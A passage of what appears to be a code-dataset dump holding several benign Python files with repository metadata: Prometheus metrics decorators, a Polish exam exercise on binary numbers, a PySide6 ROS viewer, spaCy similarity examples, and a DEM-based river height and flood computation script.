"line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 227, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 298, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": 
"numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 356, "usage_type": "attribute"}, {"api_name": "numpy.nonzero", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 382, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.tri", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 506, "usage_type": "call"}]} +{"seq_id": "26526599687", "text": "import time\nimport socket\nfrom functools import wraps\n\nfrom prometheus_client import Gauge, Histogram, Counter\n\n\nHOST_NAME = socket.gethostname()\n\n\ndef setup_histogram(*histograms):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n for h in histograms:\n h.labels(hostname=HOST_NAME).observe(time.time() - start)\n\n return _wrapper\n\n return wrapper\n\n\ndef setup_counter(*counters):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n for c in counters:\n c.inc(1)\n return func(*args, **kwargs)\n\n return _wrapper\n\n return wrapper\n\n\n# taskflow metrics\nTASKFLOW_TIMEOUT_NODES_NUMBER = Gauge(\n \"taskflow_timeout_nodes_number\", \"amount of timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_RUNNING_NODES_NUMBER = Gauge(\n \"taskflow_running_nodes_number\", \"amount of running nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_SCANNING_TIME = Histogram(\n \"taskflow_timeout_nodes_scanning_time\", \"time to scan timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_PROCESSING_TIME = 
Histogram(\n \"taskflow_timeout_nodes_processing_time\", \"time to process timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_TASK_DURATION = Histogram(\n \"taskflow_node_auto_retry_task_duration\", \"time to process node auto retry task\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_LOCK_ACCUIRE_FAIL = Counter(\n \"taskflow_node_auto_retry_lock_accuire_fail\", \"node auto retry lock fetch fail count\", labelnames=[\"hostname\"]\n)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 13, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 29, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 41, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 44, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 50, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 53, "usage_type": "call"}, {"api_name": "prometheus_client.Counter", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "19812397452", "text": "# Arkusz: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/MIN-R2_1P-152.pdf\n# Wyniki: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/odpowiedzi/MIN-R1-N.pdf\nfrom collections import Counter\n\n\ndef wczytaj(nazwa):\n with open(nazwa) as plik:\n # return list(map(str.strip, plik)) # SKRÓTOWIEC\n\n wynik = []\n for linia in plik:\n wynik.append(linia.strip())\n return wynik\n\n\ndef przezerowane(liczby):\n # return sum(1 for i in liczby if Counter(i).most_common(1)[0][0] == '0') # SKRÓTOWIEC\n\n suma = 0\n for i in liczby:\n if Counter(i).most_common(1)[0][0] == \"0\":\n suma += 1\n return suma\n\n\ndef podzielne(liczby):\n przez_2 = 0\n przez_8 = 0\n for liczba in liczby:\n if liczba[-1] == \"0\":\n przez_2 += 1\n if liczba[-3:] == \"000\":\n przez_8 += 1\n\n return {\"2\": przez_2, \"8\": przez_8}\n\n\ndef gdzie_minmax(liczby):\n # algorytmicznie suboptymalne, ale bardziej idiomatyczne\n pomocnik = [int(i, 2) for i in liczby]\n gdzie_min = pomocnik.index(min(pomocnik))\n gdzie_max = pomocnik.index(max(pomocnik))\n return gdzie_min, gdzie_max\n\n\nif __name__ == \"__main__\":\n liczby = wczytaj(\"liczby.txt\")\n\n wynik = podzielne(liczby)\n gdzie_min, gdzie_max = gdzie_minmax(liczby)\n\n print(f\"Liczb mających więcej zer niż jedynek: {przezerowane(liczby)}.\")\n print(f\"Liczb podzielnych przez 2: {wynik['2']}.\")\n print(f\"Liczb podzielnych przez 8: {wynik['8']}.\")\n print(\n f\"Najmniejsza liczba znajduje się w wierszu {gdzie_min + 1}\"\n ) # bo w życiu liczymy od 1\n print(f\"Największa liczba znajduje się w wierszu {gdzie_max + 1}\")\n", "repo_name": "dekoza/pymatura", "sub_path": "N_2015/zad4.py", "file_name": "zad4.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": 
[{"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "31287668350", "text": "import sys\nimport os\n\nfrom PySide6.QtCore import QUrl, Signal\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtWebChannel import QWebChannel\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\n\nfrom .ros_handler import ROS2Thread, SignalHandler\nfrom .backend import Backend\n\nclass MainWindow(QMainWindow):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle('ROSTron Viewer')\n\n # Field\n self.web = QWebEngineView(self)\n self.channel = QWebChannel()\n self.web.page().setWebChannel(self.channel)\n self.backend = Backend()\n self.channel.registerObject(\"backend\", self.backend)\n\n url = QUrl.fromLocalFile(os.path.join(\n os.path.dirname(__file__), \"index.html\"))\n self.web.load(url)\n self.setCentralWidget(self.web)\n\n # ROS2 Thread\n self.ros_thread = ROS2Thread(parent=self)\n self.ros_thread.start()\n\n # Signal Handler\n SignalHandler().field.connect(self.backend.set_field)\n SignalHandler().ball.connect(self.backend.set_ball)\n SignalHandler().yellow.connect(self.backend.set_yellow)\n SignalHandler().allies.connect(self.backend.set_allies)\n SignalHandler().opponents.connect(self.backend.set_opponents)\n SignalHandler().add_annotation.connect(self.backend.add_annotation)\n SignalHandler().del_annotation.connect(self.backend.del_annotation)\n\n\n\ndef main():\n app = QApplication(sys.argv)\n w = MainWindow()\n w.showMaximized()\n app.exec()\n", "repo_name": "NAELIC/rostron_viewer", "sub_path": "rostron_viewer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 12, "usage_type": "name"}, {"api_name": "PySide6.QtWebEngineWidgets.QWebEngineView", "line_number": 19, "usage_type": "call"}, {"api_name": "PySide6.QtWebChannel.QWebChannel", "line_number": 20, "usage_type": "call"}, {"api_name": "backend.Backend", "line_number": 22, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl.fromLocalFile", "line_number": 25, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ros_handler.ROS2Thread", "line_number": 31, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 37, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "35849913772", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:14:46 
2019\n\n@author: Josh\n\"\"\"\n\n#Similarity examples (1)\n\nimport spacy\n\nnlp = spacy.load('en_core_web_md')\n\n#Compare two documents\ndoc1 = nlp(\"I like fast food\")\ndoc2 = nlp(\"I like pizza\")\nprint(doc1.similarity(doc2))\n\n#Compare two tokens\ndoc = nlp(\"I like pizza and pasta\")\ntoken1 = doc[2]\ntoken2 = doc[4]\nprint(token1.similarity(token2))\n\n#Similarity examples (2)\n\n#Compare a document with a token\ndoc = nlp(\"I like pizza\")\ntoken = nlp(\"soap\")[0]\n\nprint(doc.similarity(token))\n\n#Compare a span with a document\nspan = nlp(\"I like pizza and pasta\")[2:5]\ndoc = nlp(\"McDonalds sells burgers\")\n\nprint(span.similarity(doc))\n\n#Word vectors in spaCy\n\ndoc = nlp(\"I have a banana\")\n#Access the vector via the token.vector attribute\nprint(doc[3].vector)\n\n#Similarity depends on the application context\n\ndoc1 = nlp(\"I like cats\")\ndoc2 = nlp(\"I hate cats\")\n\nprint(doc1.similarity(doc2))", "repo_name": "joshuagladwin/Advanced-NLP-with-spaCy", "sub_path": "Chapter 2 - Large-scale data analysis with spaCy/8 - Word vector and semantic similarities.py", "file_name": "8 - Word vector and semantic similarities.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "1975467335", "text": "import WaterShed\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import unravel_index\nimport pytz\nfrom datetime import datetime\nimport networkx as nx\nfrom tqdm import tqdm\nfrom os import path\nimport os\n\n\n\nclass Graph():\n\n def __init__(self, dem=None, fdir=None, acc=None, compression=1):\n self.dem = dem\n self.fdir = fdir\n self.acc = acc\n self.compression = compression\n self.point_size_meteres = 35\n\n\n def compute_height(self, file_path, DEMs_path, min_acc, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n self.df_new = pd.DataFrame(columns=['hstation_id', 'x_lon', 'y_lat', 'height', 'distance_m', 'error'])\n self.df_new = self.df_new.astype(dtype= {'hstation_id':'int64', 'height':'int64', 'distance_m':'int64', 'error':'int64'})\n x_lon_past, y_lat_past = None, None\n\n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n coordinate = (x_lon, y_lat)\n\n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n # Set acc values as None to calulate them later\n self.acc_slice = None\n self.acc_Graph = None\n \n if lat_num+1 < 60:\n self.point_size_meteres = 35\n self.compression = 2\n else:\n self.point_size_meteres = 65\n self.compression = 1\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n 
self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=self.compression)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n\n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n height, distance, success = self.compute_height_differance(coordinate, top_left, bottom_right, 10000, min_acc)\n error = 1 if success == False else 0\n\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': int(height),\n 'distance_m': int(distance),\n 'error': int(error)\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': 0,\n 'distance_m': 0,\n 'error': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n\n \n\n def compute_DEM(self, pathes, lng_num, lat_num, compression=3):\n if len(pathes) == 9:\n shed = WaterShed.WaterSheds(files_pathes=pathes, compute_acc=True, compression=compression)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n else:\n # Use only central tile\n lat = str(lat_num)\n lng = ''.join((['0'] + list(str(int(lng_num))))[-3:])\n shed = WaterShed.WaterSheds(file_path=f'n{lat}_e{lng}_1arc_v3.tif', compute_acc=True)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n\n\n def compute_height_differance(self, coordinate, top_left, bottom_right, lenth, min_acc):\n # In case to not create acc_graph every time for same lon & lat\n if (self.acc_slice is None) or (self.acc_Graph is None):\n acc_slice = self.acc.copy()\n # Filter river cells\n self.create_acc_graph(acc_slice, self.fdir, min_acc)\n\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success = self.compute_river_path(point, lenth)\n\n start, end = river_pathes_nodes_DOWN[-1], river_pathes_nodes_UP[-1]\n start_height, end_height = self.dem[start], self.dem[end]\n return abs(start_height - end_height), distance, success\n\n\n def compute_river_path(self, point, lenth):\n \"\"\"\n Function returns all river nodes down and up from the given point.\n * lenth - in meteres from start to up and down.\n \"\"\"\n point_lenth = self.compression * self.point_size_meteres # around 35 meteres shape for each point\n\n # DOWN\n river_pathes_lenght_DOWN = int(lenth/point_lenth) # количество затопленных клеток реки вниз по течению\n river_pathes_nodes_DOWN = [point] # Стартовая точка тоже входит.\n node = point\n for _ in 
tqdm(range(river_pathes_lenght_DOWN)):\n try:\n new_node = self.out_node(node)\n river_pathes_nodes_DOWN.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_DOWN[-1]}\\nCollected {len(river_pathes_nodes_DOWN)} nodes\")\n break\n \n # UP\n river_pathes_lenght_UP = int(lenth/point_lenth) # количество затопленных клеток реки вверх по течению\n river_pathes_nodes_UP = [point] # Стартовая точка тоже входит.\n node = point\n for _ in tqdm(range(river_pathes_lenght_UP)):\n try:\n new_node = self.in_node(node)\n river_pathes_nodes_UP.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_UP[-1]}\\nCollected {len(river_pathes_nodes_UP)} nodes\")\n break\n \n distance = (len(river_pathes_nodes_DOWN) + len(river_pathes_nodes_UP)) * point_lenth\n success = True if (len(river_pathes_nodes_DOWN) == river_pathes_lenght_DOWN + 1) and (len(river_pathes_nodes_UP) > (0.5*river_pathes_lenght_UP)) else False\n return river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success\n\n\n def coordinate2point(self, coordinate, top_left, bottom_right):\n # lng - horizontal, lat - vertical\n # shape[0] - vertical \n # shape[1] - horizontal\n lng, lat = coordinate\n lng_left, lng_right = top_left[0], bottom_right[0]\n lat_top, lat_bottom = top_left[1], bottom_right[1]\n lng = abs(lng_left - lng) / abs(lng_left - lng_right)\n lat = 1 - (abs(lat_bottom - lat) / abs(lat_top - lat_bottom))\n\n x_path, y_path = 1/self.dem.shape[1], 1/self.dem.shape[0]\n x_coordinate = int(round(lng/x_path, 0))\n y_coordinate = int(round(lat/y_path, 0))\n\n # Check that coordinate contains right cell\n # There can be error with rounding\n if self.accumulation_for_point((y_coordinate, x_coordinate)) < 1000:\n acc_near = self.acc[\n y_coordinate-4 : y_coordinate+5,\n x_coordinate-4 : x_coordinate+5\n ]\n max_index = unravel_index(acc_near.argmax(), acc_near.shape)\n y_coordinate = y_coordinate + max_index[0]-4\n x_coordinate = x_coordinate + max_index[1]-4\n return (y_coordinate, x_coordinate)\n else:\n return (y_coordinate, x_coordinate)\n\n\n def create_acc_graph(self, acc_slice, dir_slice, min_acc):\n acc_slice[acc_slice < min_acc] = 0\n self.acc_slice = acc_slice # For future nodes matching\n self.acc_Graph = nx.DiGraph()\n for i in range(1, acc_slice.shape[0]-1):\n for j in range(1, acc_slice.shape[1]-1):\n if acc_slice[i, j] != 0:\n dir = dir_slice[i, j]\n dir = dir if dir >= 1 else 1\n start = (i, j)\n target = self.fdir_coordinate(start, dir)\n #print(start, target)\n self.acc_Graph.add_edge(start, target)\n\n\n def fdir_coordinate(self, point, dir):\n (row, column) = point\n if dir == 64: #Up\n return (row - 1, column)\n elif dir == 128: #Up-Right\n return (row - 1, column + 1)\n elif dir == 1: #Right\n return (row, column + 1)\n elif dir == 2: #Down-Right\n return (row + 1, column + 1)\n elif dir == 4: #Down\n return (row + 1, column)\n elif dir == 8: #Down-Left\n return (row + 1, column - 1)\n elif dir == 16: #Left\n return (row, column - 1)\n else: #Up-Left\n return (row - 1, column - 1)\n\n \n def out_node(self, node):\n return [node for node in self.acc_Graph.edges(node)][0][1]\n\n def out_node_G(self, node):\n return [node for node in self.G.edges(node)][0][1]\n\n def in_node(self, node):\n in_nodes = [edge[0] for edge in self.acc_Graph.in_edges(node)]\n nodes_accumulation = [self.acc_slice[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n \n def 
in_nodes(self, node):\n return [node[0] for node in self.G.in_edges(node)]\n\n\n def accumulation_for_point(self, point):\n return self.acc[point[0], point[1]]\n\n\n\n \n # Flood Part\n\n def compute_flood(self, coordinate, top_left, bottom_right, lenth, target_h, uniform_flooding=False):\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n y, x = point[0], point[1]\n lenth_with_offset = int(lenth/(self.point_size_meteres * self.compression) + 40) # For offset\n flood_area_fdir = self.fdir[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_dem = self.dem[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_acc = self.acc.copy()\n flood_area_acc = flood_area_acc[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n new_x, new_y = lenth_with_offset, lenth_with_offset\n new_point = (new_y, new_x)\n\n # Create temporary acc graph\n self.create_acc_graph(flood_area_acc, flood_area_fdir, 200)\n\n # Get river pathes\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, _, success = self.compute_river_path(new_point, lenth)\n\n # Graph for specified area\n self.G = nx.DiGraph()\n shape = flood_area_fdir.shape\n\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = flood_area_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n self.G.add_edge(start, target)\n\n # Make flood\n if uniform_flooding == False:\n self.h = flood_area_dem[new_y, new_x] + target_h\n\n flooded_nodes_down = []\n all_out_nodes = [] # For both up and down\n for i, node in enumerate(river_pathes_nodes_DOWN[::-1]): # Начинаем с последней затопленной клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_DOWN[0]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n #print(node, in_nodes)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_DOWN).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n\n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). 
From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_down += all_nodes\n all_out_nodes += out_nodes_log\n\n flooded_nodes_up = []\n for i, node in enumerate(river_pathes_nodes_UP): # Начинаем с первой клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_UP[-1]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_UP).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_up += all_nodes\n all_out_nodes += out_nodes_log\n\n self.h = flood_area_dem[new_y, new_x] + target_h\n return flood_area_acc.shape, flooded_nodes_down, flooded_nodes_up, all_out_nodes, flood_area_dem, self.h, point, lenth_with_offset\n\n \n def get_step(self, y_delta, x_delta):\n \"\"\"\n Calculate step for future river slice\n \"\"\"\n if ((y_delta > 3) and (x_delta > 3)) \\\n or ((y_delta < -3) and (x_delta < -3)):\n return (1, 1)\n elif ((y_delta > 3) and (x_delta < -3)) \\\n or ((y_delta < -3) and (x_delta >3)):\n return (1, -1)\n elif x_delta <= 3:\n return (0, 1)\n else:\n return (1, 0)\n\n \n def get_river_slice(self, file_path, DEMs_path, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n # Creat new df to save successes of river slices\n self.df_new = pd.DataFrame(columns=['hstation_id', 'success'])\n \n # For future save\n self.dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n \n x_lon_past, y_lat_past = None, None\n \n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n max_height = int(row[3])\n coordinate = (x_lon, y_lat)\n \n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + 
